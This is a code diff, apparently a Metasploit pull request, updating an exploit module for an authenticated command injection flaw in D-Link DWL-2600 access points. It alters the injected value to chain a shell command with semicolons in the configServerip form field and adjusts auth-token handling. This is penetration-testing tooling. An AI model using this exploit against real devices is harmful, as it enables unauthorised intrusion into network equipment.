-    end
-
   end
 
   # Handle incoming requests from the server

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -64,13 +64,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts={})
-    cmd.prepend('/usr/bin/') if cmd.start_with?('wget')
     bogus = Rex::Text.rand_text_alpha(rand(10))
 
     post_data = Rex::MIME::Message.new
     post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
     post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
-    post_data.add_part("`#{cmd}`", nil, nil, "form-data; name=\"configServerip\"")
+    post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
 
     print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
     res = send_request_cgi({
@@ -121,20 +120,20 @@ class MetasploitModule < Msf::Exploit::Remote
     delstart = 'var cookieValue = "'
     tokenoffset = res.body.index(delstart) + delstart.size
     endoffset = res.body.index('";', tokenoffset)
-    token = res.body[tokenoffset, endoffset - tokenoffset]
+    @token = res.body[tokenoffset, endoffset - tokenoffset]
 
-    if token.empty?
+    if @token.empty?
       fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
     end
 
-    print_good("#{peer} - Received Auth token: #{token}")
+    print_good("#{peer} - Received Auth token: #{@token}")
     if target.name =~ /CMD/
       unless datastore['CMD']
         fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
       end
       execute_command(payload.encoded)
     else
-      execute_cmdstager(linemax: 100)
+      execute_cmdstager(linemax: 100, noconcat: true)
     end
   end
 end


### PR DESCRIPTION
This module takes advantage of a previously discovered command injection
vulnerability in DLINK DWL-2600 WiFi Access points.  This vulnerability
is authenticated, and the module is responsible for retrieving a valid
authentication token.

Documentation markdown is included for instructions and example output.